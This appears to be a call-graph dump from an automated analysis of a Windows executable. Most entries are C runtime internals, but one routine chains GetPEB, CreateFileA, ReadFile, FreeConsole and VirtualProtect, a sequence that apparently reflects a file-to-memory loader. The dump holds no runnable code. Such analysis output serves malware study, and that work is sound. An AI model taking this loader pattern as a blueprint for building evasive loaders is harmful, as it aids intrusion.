92be3f 14568 92be5d 14554->14568 14556 92bdd3 ___scrt_uninitialize_crt 14556->14554 14560 92bd31 14556->14560 14559->14556 14561 92bd3d ___scrt_is_nonwritable_in_current_image 14560->14561 14571 92875f EnterCriticalSection 14561->14571 14563 92bd47 ___scrt_uninitialize_crt 14567 92bd80 14563->14567 14572 92bbc2 14563->14572 14583 92bdb1 14567->14583 14684 92b767 LeaveCriticalSection 14568->14684 14570 92bbc0 14570->14542 14571->14563 14573 92bbd7 _Fputc 14572->14573 14574 92bbe9 14573->14574 14575 92bbde 14573->14575 14586 92bc27 14574->14586 14576 92bce4 ___scrt_uninitialize_crt 68 API calls 14575->14576 14579 92bbe4 _Fputc 14576->14579 14579->14567 14581 92bc0a 14599 935164 14581->14599 14683 928773 LeaveCriticalSection 14583->14683 14585 92bd9f 14585->14556 14587 92bc40 14586->14587 14591 92bbf3 14586->14591 14588 930efc __fread_nolock 29 API calls 14587->14588 14587->14591 14589 92bc5c 14588->14589 14610 93549f 14589->14610 14591->14579 14592 930efc 14591->14592 14593 930f08 14592->14593 14594 930f1d 14592->14594 14595 92ad6d __dosmaperr 14 API calls 14593->14595 14594->14581 14596 930f0d 14595->14596 14597 92b458 __strnicoll 29 API calls 14596->14597 14598 930f18 14597->14598 14598->14581 14600 935182 14599->14600 14601 935175 14599->14601 14603 9351cb 14600->14603 14605 9351a9 14600->14605 14602 92ad6d __dosmaperr 14 API calls 14601->14602 14608 93517a 14602->14608 14604 92ad6d __dosmaperr 14 API calls 14603->14604 14606 9351d0 14604->14606 14653 9351e1 14605->14653 14607 92b458 __strnicoll 29 API calls 14606->14607 14607->14608 14608->14579 14611 9354ab ___scrt_is_nonwritable_in_current_image 14610->14611 14612 9354ec 14611->14612 14614 935532 14611->14614 14620 9354b3 14611->14620 14613 92b601 _Fputc 29 API calls 14612->14613 14613->14620 14621 934ef9 EnterCriticalSection 14614->14621 14616 935538 14617 935556 14616->14617 14622 935283 14616->14622 14650 9355a8 14617->14650 14620->14591 14621->14616 14623 9352ab 14622->14623 14647 9352ce __fread_nolock 14622->14647 14624 9352af 14623->14624 14626 93530a 14623->14626 14625 92b601 _Fputc 29 API calls 14624->14625 14625->14647 14627 935328 14626->14627 14629 934033 _Fputc 31 API calls 14626->14629 14628 9355b0 _Fputc 40 API calls 14627->14628 14630 93533a 14628->14630 14629->14627 14647->14617 14651 934f1c __fread_nolock LeaveCriticalSection 14650->14651 14652 9355ae 14651->14652 14652->14620 14654 9351ed ___scrt_is_nonwritable_in_current_image 14653->14654 14666 934ef9 EnterCriticalSection 14654->14666 14656 935241 14658 92ad6d __dosmaperr 14 API calls 14656->14658 14657 9351fc 14657->14656 14667 934cb0 14657->14667 14660 935248 14658->14660 14666->14657 14668 934cd2 14667->14668 14669 934cbd 14667->14669 14683->14585 14684->14570 14685 921614 GetPEB 14707 921098 14685->14707 14688 921680 GetFileSize 14691 921804 CloseHandle 14688->14691 14692 921694 14688->14692 14689 921828 14690 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14689->14690 14693 921836 14690->14693 14691->14689 14694 92169c ReadFile 14692->14694 14695 9217fb 14694->14695 14696 9216b9 CloseHandle 14694->14696 14695->14691 14704 9216d0 std::ios_base::_Ios_base_dtor _Yarn _strlen 14696->14704 14706 9217f9 14696->14706 14698 921840 14750 921860 14698->14750 14700 921845 14752 92b468 14700->14752 14704->14698 14704->14700 14704->14706 14732 92186a 14704->14732 14738 922952 14704->14738 14718 92155c 14706->14718 14716 9210c1 std::ios_base::_Ios_base_dtor _Yarn _strlen 14707->14716 14717 92120e 14707->14717 14708 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14709 921227 CreateFileA 14708->14709 14709->14688 14709->14689 14710 921231 14711 921860 std::ios_base::_Init 31 API calls 14710->14711 14712 921236 14711->14712 14713 92b468 std::ios_base::_Init 29 API calls 14712->14713 14713->14712 14714 92186a std::ios_base::_Init 31 API calls 14714->14716 14715 922952 codecvt 16 API calls 14715->14716 14716->14710 14716->14712 14716->14714 14716->14715 14716->14717 14717->14708 14719 921098 31 API calls 14718->14719 14720 921582 FreeConsole 14719->14720 14757 92123b 14720->14757 14723 92123b 103 API calls 14724 9215b9 14723->14724 14725 921098 31 API calls 14724->14725 14726 9215cc VirtualProtect 14725->14726 14727 9215f1 ExitProcess 14726->14727 14728 9215dd 14726->14728 14729 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14728->14729 14730 9215e7 14729->14730 14730->14689 14733 921873 14732->14733 14734 92188b 14732->14734 14735 922952 codecvt 16 API calls 14733->14735 15372 921890 14734->15372 14737 92187c 14735->14737 14737->14704 14741 922957 14738->14741 14739 92c994 ___std_exception_copy 15 API calls 14739->14741 14740 922971 14740->14704 14741->14739 14741->14740 14742 928f08 codecvt 2 API calls 14741->14742 14743 922973 14741->14743 14742->14741 14744 924a6f codecvt 14743->14744 14745 92297d Concurrency::cancel_current_task 14743->14745 14746 925aba CallUnexpected RaiseException 14744->14746 14748 925aba CallUnexpected RaiseException 14745->14748 14747 924a8b 14746->14747 14749 9231cf 14748->14749 15377 9231d0 14750->15377 14753 92b6a7 __strnicoll 29 API calls 14752->14753 14754 92b477 14753->14754 14755 92b485 __Getctype 11 API calls 14754->14755 14756 92b484 14755->14756 14758 921263 14757->14758 14759 921355 14758->14759 14764 92136e 14758->14764 14780 921533 14758->14780 14760 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14759->14760 14761 921363 14760->14761 14761->14723 14765 92138d _strlen 14764->14765 14787 92197e 14765->14787 14767 921444 14791 92408b 14767->14791 14769 921515 14816 921a10 14769->14816 14772 9214c0 14801 921ab6 14772->14801 14773 9213ad 14773->14767 14773->14772 14795 9219d8 14773->14795 14775 921466 14775->14772 14778 9219d8 69 API calls 14775->14778 14776 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14777 921529 14776->14777 14777->14758 14778->14775 15111 9223c4 14780->15111 14785 921a3a 40 API calls 14786 921558 14785->14786 14786->14758 14788 921995 14787->14788 14789 9219a6 14788->14789 14820 921a3a 14788->14820 14789->14773 14792 9240ad _Yarn 14791->14792 14794 92409a 14791->14794 14792->14794 14830 92c578 14792->14830 14794->14775 14796 9219e5 14795->14796 14797 9219ee 14796->14797 14903 923c29 14796->14903 14912 923c0b 14796->14912 14924 923c1b 14796->14924 14797->14773 14802 921ad6 14801->14802 14803 921ae9 14801->14803 14804 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14802->14804 14805 921af9 14803->14805 14972 925aba 14803->14972 14806 921ae1 14804->14806 14975 921c57 14805->14975 14806->14769 14812 925aba CallUnexpected RaiseException 14813 921b3a 14812->14813 14986 921e48 14813->14986 14818 921a18 14816->14818 14817 92151e 14817->14776 14818->14817 15107 9222fe 14818->15107 14821 921aa2 14820->14821 14822 921a5a 14820->14822 14823 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14821->14823 14824 92197e 40 API calls 14822->14824 14825 921aad 14823->14825 14826 921a64 14824->14826 14825->14789 14827 921a9b 14826->14827 14829 921ab6 std::ios_base::_Init 40 API calls 14826->14829 14828 921a10 40 API calls 14827->14828 14828->14821 14829->14827 14831 92c58b _Fputc 14830->14831 14834 92c759 14831->14834 14833 92c5a0 _Fputc 14833->14794 14835 92c767 14834->14835 14841 92c78f 14834->14841 14836 92c796 14835->14836 14837 92c774 14835->14837 14835->14841 14842 92c81c 14836->14842 14838 92b601 _Fputc 29 API calls 14837->14838 14838->14841 14841->14833 14843 92c828 ___scrt_is_nonwritable_in_current_image 14842->14843 14850 92875f EnterCriticalSection 14843->14850 14845 92c836 14851 92c7d0 14845->14851 14850->14845 14861 930bb7 14851->14861 14858 92c86b 14902 928773 LeaveCriticalSection 14858->14902 14860 92c7ce 14860->14833 14882 930c62 14861->14882 14863 930bc8 _Fputc 14864 92c7e8 14863->14864 14865 92e531 __fread_nolock 15 API calls 14863->14865 14868 92c5b2 14864->14868 14866 930c21 14865->14866 14867 92e4f7 ___free_lconv_mon 14 API calls 14866->14867 14867->14864 14871 92c5c4 14868->14871 14873 92c5ed 14868->14873 14869 92c5d2 14870 92b601 _Fputc 29 API calls 14869->14870 14870->14873 14871->14869 14871->14873 14876 92c608 _Yarn 14871->14876 14878 930ca0 14873->14878 14874 92bc27 ___scrt_uninitialize_crt 64 API calls 14874->14876 14875 930efc __fread_nolock 29 API calls 14875->14876 14876->14873 14876->14874 14876->14875 14877 93549f _Fputc 64 API calls 14876->14877 14889 935eec 14876->14889 14877->14876 14879 930cab 14878->14879 14880 92c812 14878->14880 14879->14880 14881 92bc27 ___scrt_uninitialize_crt 64 API calls 14879->14881 14880->14858 14881->14880 14883 930c6e _Fputc 14882->14883 14884 930c98 14883->14884 14885 930efc __fread_nolock 29 API calls 14883->14885 14884->14863 14886 930c89 14885->14886 14887 938994 __fread_nolock 29 API calls 14886->14887 14888 930c8f 14887->14888 14888->14863 14890 935f7c 14889->14890 14891 930efc __fread_nolock 29 API calls 14890->14891 14894 935f89 14891->14894 14892 935f95 14892->14876 14893 935fe1 14893->14892 14895 936043 14893->14895 14897 930c62 _Fputc 29 API calls 14893->14897 14894->14892 14894->14893 14896 935ef7 _Fputc 31 API calls 14894->14896 14898 936072 _Fputc 64 API calls 14895->14898 14896->14893 14899 936036 14897->14899 14900 936054 14898->14900 14899->14895 14901 937d00 __fread_nolock 14 API calls 14899->14901 14900->14876 14901->14895 14902->14860 14905 923c45 14903->14905 14909 923c4c 14903->14909 14904 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14906 923d31 14904->14906 14905->14904 14906->14797 14908 923cf2 14908->14905 14911 92c578 69 API calls 14908->14911 14909->14905 14909->14908 14910 923c92 14909->14910 14910->14905 14937 9235da 14910->14937 14911->14905 14913 923c12 14912->14913 14918 923c5e 14912->14918 14970 92875f EnterCriticalSection 14913->14970 14915 923c17 14915->14797 14916 923c62 14917 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14916->14917 14919 923d31 14917->14919 14918->14916 14921 923cf2 14918->14921 14922 923c92 14918->14922 14919->14797 14920 9235da _Fputc 68 API calls 14920->14916 14921->14916 14923 92c578 69 API calls 14921->14923 14922->14916 14922->14920 14923->14916 14925 923c22 14924->14925 14929 923c6e 14924->14929 14971 928773 LeaveCriticalSection 14925->14971 14927 923bf9 14927->14797 14928 923c27 14928->14797 14929->14927 14930 923cf2 14929->14930 14931 923cd3 14929->14931 14932 92c578 69 API calls 14930->14932 14935 923ce4 14930->14935 14933 9235da _Fputc 68 API calls 14931->14933 14931->14935 14932->14935 14933->14935 14934 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14936 923d31 14934->14936 14935->14934 14936->14797 14940 92c079 14937->14940 14939 9235ea 14939->14905 14941 92c08c _Fputc 14940->14941 14944 92c0da 14941->14944 14943 92c09b _Fputc 14943->14939 14945 92c0e6 ___scrt_is_nonwritable_in_current_image 14944->14945 14946 92c113 14945->14946 14947 92c0ef 14945->14947 14960 92875f EnterCriticalSection 14946->14960 14948 92b601 _Fputc 29 API calls 14947->14948 14957 92c108 _Fputc 14948->14957 14950 92c11c 14951 930efc __fread_nolock 29 API calls 14950->14951 14959 92c131 14950->14959 14951->14959 14952 92c1ce 14961 92c0ad 14952->14961 14953 92c19d 14954 92b601 _Fputc 29 API calls 14953->14954 14954->14957 14956 92c1da 14966 92c206 14956->14966 14957->14943 14959->14952 14959->14953 14960->14950 14962 92c0bb 14961->14962 14963 92c0cc 14961->14963 14964 935eec _Fputc 66 API calls 14962->14964 14963->14956 14965 92c0c7 14964->14965 14965->14956 14969 928773 LeaveCriticalSection 14966->14969 14968 92c20c 14968->14957 14969->14968 14970->14915 14971->14928 14973 925b02 RaiseException 14972->14973 14974 925ad4 14972->14974 14973->14805 14974->14973 14976 921b17 14975->14976 14977 921c7a 14975->14977 14983 921b3a 14976->14983 15003 9229d4 AcquireSRWLockExclusive 14977->15003 14979 921c84 14979->14976 15008 922a89 14979->15008 14984 921e48 std::ios_base::_Init 40 API calls 14983->14984 14985 921b2f 14984->14985 14985->14812 14987 921e75 _strlen 14986->14987 14988 921e80 14987->14988 14989 921f5e 14987->14989 14991 921ed0 14988->14991 14992 921ec8 14988->14992 14998 921e8f _Yarn 14988->14998 14990 921860 std::ios_base::_Init 31 API calls 14989->14990 14993 921f63 14990->14993 14995 922952 codecvt 16 API calls 14991->14995 14994 92186a std::ios_base::_Init 31 API calls 14992->14994 14996 92b468 std::ios_base::_Init 29 API calls 14993->14996 14994->14998 14995->14998 14996->14993 15047 921f68 14998->15047 15000 921f30 std::ios_base::_Ios_base_dtor 15001 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15000->15001 15002 921b4f 15001->15002 15002->14769 15005 9229e8 15003->15005 15006 9229ed ReleaseSRWLockExclusive 15005->15006 15012 922a74 SleepConditionVariableSRW 15005->15012 15006->14979 15013 922a9e 15008->15013 15011 922a23 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 15011->14976 15012->15005 15014 922ab4 15013->15014 15015 922aad 15013->15015 15022 92aa54 15014->15022 15019 92aac5 15015->15019 15018 921c9a 15018->15011 15020 92aa54 std::ios_base::_Init 32 API calls 15019->15020 15021 92aad7 15020->15021 15021->15018 15025 92acb7 15022->15025 15026 92acc3 ___scrt_is_nonwritable_in_current_image 15025->15026 15033 92b750 EnterCriticalSection 15026->15033 15028 92acd1 15034 92aadb 15028->15034 15030 92acde 15044 92ad06 15030->15044 15033->15028 15035 92aaf6 15034->15035 15036 92ab69 std::_Locinfo::_Locinfo_dtor 15034->15036 15035->15036 15037 92ab49 15035->15037 15039 933f46 std::ios_base::_Init 32 API calls 15035->15039 15036->15030 15037->15036 15038 933f46 std::ios_base::_Init 32 API calls 15037->15038 15040 92ab5f 15038->15040 15041 92ab3f 15039->15041 15042 92e4f7 ___free_lconv_mon 14 API calls 15040->15042 15043 92e4f7 ___free_lconv_mon 14 API calls 15041->15043 15042->15036 15043->15037 15045 92b767 std::_Lockit::~_Lockit LeaveCriticalSection 15044->15045 15046 92aa85 15045->15046 15046->15018 15048 921fa0 15047->15048 15049 921faa 15048->15049 15050 9220be 15048->15050 15052 921ff0 15049->15052 15053 921fe8 15049->15053 15059 921fb2 _Yarn 15049->15059 15051 921860 std::ios_base::_Init 31 API calls 15050->15051 15054 9220c3 15051->15054 15056 922952 codecvt 16 API calls 15052->15056 15055 92186a std::ios_base::_Init 31 API calls 15053->15055 15058 92b468 std::ios_base::_Init 29 API calls 15054->15058 15055->15059 15056->15059 15058->15054 15066 9220c8 15059->15066 15063 922085 std::ios_base::_Ios_base_dtor 15064 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15063->15064 15065 921f0d 15064->15065 15065->14993 15065->15000 15067 9220ea 15066->15067 15068 9220f8 15066->15068 15085 92218a 15067->15085 15070 92218a std::ios_base::_Init 40 API calls 15068->15070 15071 92211b 15070->15071 15072 92213f std::ios_base::_Ios_base_dtor 15071->15072 15075 922185 15071->15075 15073 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15072->15073 15074 922029 15073->15074 15077 926097 15074->15077 15076 92b468 std::ios_base::_Init 29 API calls 15075->15076 15076->15075 15078 9260a4 15077->15078 15084 922059 15077->15084 15078->15078 15078->15084 15100 92c994 15078->15100 15081 9260d1 15083 92c522 ___std_exception_destroy 14 API calls 15081->15083 15082 92e16c ___std_exception_copy 29 API calls 15082->15081 15083->15084 15084->15054 15084->15063 15086 9221a9 15085->15086 15098 92224f std::ios_base::_Ios_base_dtor _Yarn 15085->15098 15087 9222f3 15086->15087 15088 9221b8 15086->15088 15090 921860 std::ios_base::_Init 31 API calls 15087->15090 15089 9221e3 15088->15089 15093 9222e8 15088->15093 15095 9221e9 _Yarn 15088->15095 15091 92186a std::ios_base::_Init 31 API calls 15089->15091 15090->15095 15091->15095 15092 92b468 std::ios_base::_Init 29 API calls 15097 9222fd 15092->15097 15094 922952 codecvt 16 API calls 15093->15094 15094->15095 15095->15092 15095->15098 15096 922339 15096->15068 15097->15096 15099 921ab6 std::ios_base::_Init 40 API calls 15097->15099 15098->15068 15099->15096 15105 92e531 __dosmaperr 15100->15105 15101 92e56f 15102 92ad6d __dosmaperr 14 API calls 15101->15102 15104 9260c1 15102->15104 15103 92e55a RtlAllocateHeap 15103->15104 15103->15105 15104->15081 15104->15082 15105->15101 15105->15103 15106 928f08 codecvt 2 API calls 15105->15106 15106->15105 15108 922339 15107->15108 15109 92230b 15107->15109 15108->14817 15109->15108 15110 921ab6 std::ios_base::_Init 40 API calls 15109->15110 15110->15108 15112 9223ea 15111->15112 15128 92242b 15112->15128 15115 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15116 921546 15115->15116 15117 92233c 15116->15117 15118 92197e 40 API calls 15117->15118 15119 922358 15118->15119 15120 922372 15119->15120 15121 9219d8 69 API calls 15119->15121 15122 921ab6 std::ios_base::_Init 40 API calls 15120->15122 15121->15120 15123 9223a7 15122->15123 15124 921a10 40 API calls 15123->15124 15125 9223ae 15124->15125 15126 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15125->15126 15127 921551 15126->15127 15127->14785 15145 922cd9 15128->15145 15132 92248c 15177 922d0a 15132->15177 15133 92245e 15133->15132 15159 92254a 15133->15159 15135 9224a8 15137 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15135->15137 15139 9223f0 15137->15139 15139->15115 15140 922483 15171 922d7d 15140->15171 15141 9224bc 15184 9225d6 15141->15184 15146 922ce8 15145->15146 15147 922cef 15145->15147 15195 92b77e 15146->15195 15149 92244b 15147->15149 15200 9251f8 EnterCriticalSection 15147->15200 15151 9224c2 15149->15151 15152 9224d8 15151->15152 15158 9224fc 15151->15158 15153 922cd9 std::_Lockit::_Lockit 7 API calls 15152->15153 15156 9224e3 15153->15156 15154 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15155 922509 15154->15155 15155->15133 15157 922d0a std::_Lockit::~_Lockit 2 API calls 15156->15157 15157->15158 15158->15154 15160 922563 15159->15160 15161 9225bf 15159->15161 15160->15161 15164 922952 codecvt 16 API calls 15160->15164 15162 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15161->15162 15163 92247b 15162->15163 15163->15140 15163->15141 15165 922573 15164->15165 15249 9225fa 15165->15249 15172 92c994 ___std_exception_copy 15 API calls 15171->15172 15173 922d88 15172->15173 15174 922d8f 15173->15174 15366 9231b3 15173->15366 15174->15132 15178 922d14 15177->15178 15179 92b78c 15177->15179 15180 922d27 15178->15180 15370 925206 LeaveCriticalSection 15178->15370 15371 92b767 LeaveCriticalSection 15179->15371 15180->15135 15183 92b793 15183->15135 15185 925aba CallUnexpected RaiseException 15184->15185 15186 9225fa 15185->15186 15187 922cd9 std::_Lockit::_Lockit 7 API calls 15186->15187 15188 92260b 15187->15188 15189 922647 15188->15189 15190 922635 15188->15190 15191 9231f0 codecvt 31 API calls 15189->15191 15192 922dff codecvt 65 API calls 15190->15192 15193 922651 15191->15193 15194 9224c1 15192->15194 15201 92f432 15195->15201 15200->15149 15202 92f5b9 std::_Locinfo::_Locinfo_dtor 5 API calls 15201->15202 15203 92f437 15202->15203 15222 92f5d3 15203->15222 15221 92f464 15221->15221 15223 92f534 std::_Locinfo::_Locinfo_dtor 5 API calls 15222->15223 15224 92f43c 15223->15224 15225 92f5ed 15224->15225 15226 92f534 std::_Locinfo::_Locinfo_dtor 5 API calls 15225->15226 15227 92f441 15226->15227 15228 92f607 15227->15228 15229 92f534 std::_Locinfo::_Locinfo_dtor 5 API calls 15228->15229 15230 92f446 15229->15230 15231 92f621 15230->15231 15232 92f534 std::_Locinfo::_Locinfo_dtor 5 API calls 15231->15232 15233 92f44b 15232->15233 15234 92f63b 15233->15234 15235 92f534 std::_Locinfo::_Locinfo_dtor 5 API calls 15234->15235 15236 92f450 15235->15236 15237 92f655 15236->15237 15238 92f534 std::_Locinfo::_Locinfo_dtor 5 API calls 15237->15238 15239 92f455 15238->15239 15240 92f66f 15239->15240 15241 92f534 std::_Locinfo::_Locinfo_dtor 5 API calls 15240->15241 15242 92f45a 15241->15242 15243 92f689 15242->15243 15244 92f534 std::_Locinfo::_Locinfo_dtor 5 API calls 15243->15244 15245 92f45f 15244->15245 15246 92f6a3 15245->15246 15247 92f534 std::_Locinfo::_Locinfo_dtor 5 API calls 15246->15247 15248 92f6b9 15247->15248 15248->15221 15250 922cd9 std::_Lockit::_Lockit 7 API calls 15249->15250 15251 92260b 15250->15251 15252 922647 15251->15252 15253 922635 15251->15253 15294 9231f0 15252->15294 15285 922dff 15253->15285 15258 924915 15329 928588 15258->15329 15301 92c99f 15285->15301 15289 922e33 15291 922e65 _Yarn 15 API calls 15289->15291 15290 922e24 15290->15289 15292 92c99f std::_Locinfo::_Locinfo_dtor 64 API calls 15290->15292 15293 92259b 15291->15293 15292->15289 15293->15258 15320 923292 15294->15320 15297 925aba CallUnexpected RaiseException 15298 92320f 15297->15298 15323 921918 15298->15323 15302 92f432 std::_Locinfo::_Locinfo_dtor 5 API calls 15301->15302 15303 92c9ac 15302->15303 15312 92cbd1 15303->15312 15306 922e65 15307 922e73 15306->15307 15311 922e9e _Yarn 15306->15311 15308 922e7f 15307->15308 15309 92c522 ___std_exception_destroy 14 API calls 15307->15309 15310 92c994 ___std_exception_copy 15 API calls 15308->15310 15308->15311 15309->15308 15310->15311 15311->15290 15313 92cbdd ___scrt_is_nonwritable_in_current_image 15312->15313 15314 92b750 std::_Lockit::_Lockit EnterCriticalSection 15313->15314 15315 92cbeb 15314->15315 15316 92ca72 std::_Locinfo::_Locinfo_dtor 64 API calls 15315->15316 15317 92cbf8 15316->15317 15318 92cc20 std::_Locinfo::_Locinfo_dtor LeaveCriticalSection 15317->15318 15319 922e0c 15318->15319 15319->15306 15326 923155 15320->15326 15324 926097 ___std_exception_copy 30 API calls 15323->15324 15325 92193a 15324->15325 15327 926097 ___std_exception_copy 30 API calls 15326->15327 15328 923181 15327->15328 15328->15297 15330 92e783 __Getctype 39 API calls 15329->15330 15331 928593 15330->15331 15332 92ed66 __Getctype 39 API calls 15331->15332 15367 9231c1 Concurrency::cancel_current_task 15366->15367 15368 925aba CallUnexpected RaiseException 15367->15368 15369 9231cf 15368->15369 15370->15180 15371->15183 15373 925aba CallUnexpected RaiseException 15372->15373 15374 9218b4 15373->15374 15375 926097 ___std_exception_copy 30 API calls 15374->15375 15376 9218d6 15375->15376 15376->14734 15382 923258 15377->15382 15380 925aba CallUnexpected RaiseException 15381 9231ef 15380->15381 15383 923155 std::exception::exception 30 API calls 15382->15383 15384 9231e1 15383->15384 15384->15380 15767 923e04 15768 923e10 __EH_prolog3_GS 15767->15768 15771 923e60 15768->15771 15772 923e79 15768->15772 15776 923e2a 15768->15776 15781 9235ba 15771->15781 15784 92bec9 15772->15784 15808 92535e 15776->15808 15777 923e98 15777->15776 15779 92bec9 45 API calls 15777->15779 15780 923f6d 15777->15780 15804 9233ee 15777->15804 15779->15777 15780->15776 15811 92cf47 15780->15811 15782 92bec9 45 API calls 15781->15782 15783 9235c5 15782->15783 15783->15776 15785 92bed5 ___scrt_is_nonwritable_in_current_image 15784->15785 15786 92bef7 15785->15786 15787 92bedf 15785->15787 15824 92875f EnterCriticalSection 15786->15824 15788 92ad6d __dosmaperr 14 API calls 15787->15788 15790 92bee4 15788->15790 15792 92b458 __strnicoll 29 API calls 15790->15792 15791 92bf02 15794 930efc __fread_nolock 29 API calls 15791->15794 15797 92bf1a 15791->15797 15793 92beef _Fputc 15792->15793 15793->15777 15794->15797 15795 92bf82 15799 92ad6d __dosmaperr 14 API calls 15795->15799 15796 92bfaa 15825 92bfe2 15796->15825 15797->15795 15797->15796 15801 92bf87 15799->15801 15800 92bfb0 15835 92bfda 15800->15835 15803 92b458 __strnicoll 29 API calls 15801->15803 15803->15793 15805 923422 15804->15805 15806 9233fe 15804->15806 16007 9246df 15805->16007 15806->15777 15809 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 15808->15809 15810 925368 15809->15810 15810->15810 15812 92cf53 ___scrt_is_nonwritable_in_current_image 15811->15812 15813 92cf5a 15812->15813 15814 92cf6f 15812->15814 15815 92ad6d __dosmaperr 14 API calls 15813->15815 16022 92875f EnterCriticalSection 15814->16022 15817 92cf5f 15815->15817 15819 92b458 __strnicoll 29 API calls 15817->15819 15818 92cf79 16023 92cfba 15818->16023 15821 92cf6a 15819->15821 15821->15780 15824->15791 15826 92c003 15825->15826 15827 92bfee 15825->15827 15829 92c012 15826->15829 15838 935d52 15826->15838 15828 92ad6d __dosmaperr 14 API calls 15827->15828 15830 92bff3 15828->15830 15829->15800 15832 92b458 __strnicoll 29 API calls 15830->15832 15834 92bffe 15832->15834 15834->15800 16006 928773 LeaveCriticalSection 15835->16006 15837 92bfe0 15837->15793 15839 935d5d 15838->15839 15840 935d6a 15839->15840 15844 935d82 15839->15844 15841 92ad6d __dosmaperr 14 API calls 15840->15841 15842 935d6f 15841->15842 15843 92b458 __strnicoll 29 API calls 15842->15843 15853 92c00f 15843->15853 15845 935de1 15844->15845 15844->15853 15859 937d00 15844->15859 15846 930efc __fread_nolock 29 API calls 15845->15846 15848 935dfa 15846->15848 15864 936144 15848->15864 15851 930efc __fread_nolock 29 API calls 15852 935e33 15851->15852 15852->15853 15854 930efc __fread_nolock 29 API calls 15852->15854 15853->15800 15855 935e41 15854->15855 15855->15853 15856 930efc __fread_nolock 29 API calls 15855->15856 15857 935e4f 15856->15857 15858 930efc __fread_nolock 29 API calls 15857->15858 15858->15853 15860 92f807 __dosmaperr 14 API calls 15859->15860 15861 937d1d 15860->15861 15862 92e4f7 ___free_lconv_mon 14 API calls 15861->15862 15863 937d27 15862->15863 15863->15845 15865 936150 ___scrt_is_nonwritable_in_current_image 15864->15865 15866 936158 15865->15866 15869 936173 15865->15869 15867 92ad80 __dosmaperr 14 API calls 15866->15867 15868 93615d 15867->15868 15871 92ad6d __dosmaperr 14 API calls 15868->15871 15870 93618a 15869->15870 15873 9361c5 15869->15873 15872 92ad80 __dosmaperr 14 API calls 15870->15872 15893 935e02 15871->15893 15874 93618f 15872->15874 15875 9361e3 15873->15875 15876 9361ce 15873->15876 15878 92ad6d __dosmaperr 14 API calls 15874->15878 15894 934ef9 EnterCriticalSection 15875->15894 15879 92ad80 __dosmaperr 14 API calls 15876->15879 15881 936197 15878->15881 15882 9361d3 15879->15882 15880 9361e9 15883 936208 15880->15883 15884 93621d 15880->15884 15887 92b458 __strnicoll 29 API calls 15881->15887 15885 92ad6d __dosmaperr 14 API calls 15882->15885 15886 92ad6d __dosmaperr 14 API calls 15883->15886 15895 93625d 15884->15895 15885->15881 15889 93620d 15886->15889 15887->15893 15891 92ad80 __dosmaperr 14 API calls 15889->15891 15890 936218 15958 936255 15890->15958 15891->15890 15893->15851 15893->15853 15894->15880 15896 936287 15895->15896 15897 93626f 15895->15897 15898 9365c9 15896->15898 15906 9362ca 15896->15906 15899 92ad80 __dosmaperr 14 API calls 15897->15899 15900 92ad80 __dosmaperr 14 API calls 15898->15900 15901 936274 15899->15901 15903 9365ce 15900->15903 15902 92ad6d __dosmaperr 14 API calls 15901->15902 15909 93627c 15902->15909 15904 92ad6d __dosmaperr 14 API calls 15903->15904 15907 9362e2 15904->15907 15905 9362d5 15908 92ad80 __dosmaperr 14 API calls 15905->15908 15906->15905 15906->15909 15913 936305 15906->15913 15911 92b458 __strnicoll 29 API calls 15907->15911 15910 9362da 15908->15910 15909->15890 15912 92ad6d __dosmaperr 14 API calls 15910->15912 15911->15909 15912->15907 15914 93631e 15913->15914 15915 93632b 15913->15915 15916 936359 15913->15916 15914->15915 15922 936347 15914->15922 15917 92ad80 __dosmaperr 14 API calls 15915->15917 15919 92e531 __fread_nolock 15 API calls 15916->15919 15918 936330 15917->15918 15920 92ad6d __dosmaperr 14 API calls 15918->15920 15923 93636a 15919->15923 15924 936337 15920->15924 15965 938994 15922->15965 15926 92e4f7 ___free_lconv_mon 14 API calls 15923->15926 15928 92b458 __strnicoll 29 API calls 15924->15928 15925 9364a5 15929 936519 15925->15929 15932 9364be GetConsoleMode 15925->15932 15927 936373 15926->15927 15930 92e4f7 ___free_lconv_mon 14 API calls 15927->15930 15957 936342 __fread_nolock 15928->15957 15931 93651d ReadFile 15929->15931 15933 93637a 15930->15933 15934 936591 GetLastError 15931->15934 15935 936535 15931->15935 15932->15929 15936 9364cf 15932->15936 15937 936384 15933->15937 15938 93639f 15933->15938 15939 9364f5 15934->15939 15940 93659e 15934->15940 15935->15934 15941 93650e 15935->15941 15936->15931 15942 9364d5 ReadConsoleW 15936->15942 15944 92ad6d __dosmaperr 14 API calls 15937->15944 15961 933ff3 15938->15961 15950 92ad93 __dosmaperr 14 API calls 15939->15950 15939->15957 15945 92ad6d __dosmaperr 14 API calls 15940->15945 15953 936571 15941->15953 15954 93655a 15941->15954 15941->15957 15942->15941 15947 9364ef GetLastError 15942->15947 15943 92e4f7 ___free_lconv_mon 14 API calls 15943->15909 15948 936389 15944->15948 15949 9365a3 15945->15949 15947->15939 15951 